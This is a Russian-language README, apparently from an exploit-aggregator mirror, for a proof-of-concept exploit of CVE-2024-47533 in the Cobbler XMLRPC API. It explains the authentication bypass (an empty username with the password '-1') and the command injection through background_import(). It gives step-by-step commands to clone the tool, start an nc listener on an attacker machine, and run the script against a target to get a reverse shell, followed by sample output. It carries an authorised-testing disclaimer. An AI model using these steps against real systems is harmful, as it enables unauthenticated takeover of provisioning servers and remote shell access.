## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-00XCANELO-CVE-2024-47533-POC
# CVE-2024-47533 – Обход аутентификации Cobbler XMLRPC → Обратная оболочка (RCE без аутентификации)
## 📌 Краткое описание
Этот репозиторий содержит **эксплойт Proof-of-Concept (PoC)** для **CVE-2024-47533** ,
критического обхода аутентификации в XMLRPC API Cobbler, приводящего к **удаленному выполнению кода (RCE) без аутентификации**.
Эксплойт использует уязвимость метода `login()` в XMLRPC API для обхода аутентификации и внедрения команды обратной оболочки через `background_import()`.
* * *
## ⚠️ Отказ от ответственности
Этот инструмент предназначен **только для образовательных, исследовательских целей и авторизованного тестирования на проникновение**.
**НЕ** используйте его в системах, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения.
Автор **не несет ответственности** за неправомерное использование или ущерб.
* * *
## 🛠 Технические детали
* **Тип уязвимости:** Authentication Bypass → RCE
* **Затронутый компонент:** Cobbler XMLRPC API
* **Вектор атаки:** Network
* **Требуемые привилегии:** None
* **Взаимодействие пользователя:** None
**Основная причина:**
`utils.get_shared_secret()` некорректно возвращает `-1` из-за неправильной обработки чтения файла в бинарном режиме с кодировкой, что позволяет аутентификацию с пустым именем пользователя и `-1` в качестве пароля.
**Воздействие:**
Злоумышленник может:
* Получить доступ к API на уровне администратора
* Внедрять произвольные системные команды в шаблоны Cobbler
* Запустить обратную оболочку на цели
* * *
## 🚀 Использование
### 1️⃣ Клонировать репозиторий
root@kitploit:~
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC
### 2️⃣ Настроить слушатель
На вашей атакующей машине:
root@kitploit:~
nc -lvnp 4444
### 3️⃣ Запустить эксплойт
root@kitploit:~
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>
**Пример:**
root@kitploit:~
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444
* * *
## 📂 Структура файлов
root@kitploit:~
.
├── CVE-2024-47533.py # Скрипт эксплойта обратной оболочки
└── README.md # Документация
* * *
## 📸 Пример вывода
root@kitploit:~
[*] Target: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Connecting to Cobbler...
[*] Authenticating...
[*] Executing exploit...
[+] Exploit sent! Got A Shell 🔥.
* * *
## 🧑💻 Автор
**00xCanelo**
Профиль GitHub
* * *
## 📚 Ссылки
* NVD: CVE-2024-47533
* Проект Cobbler на GitHub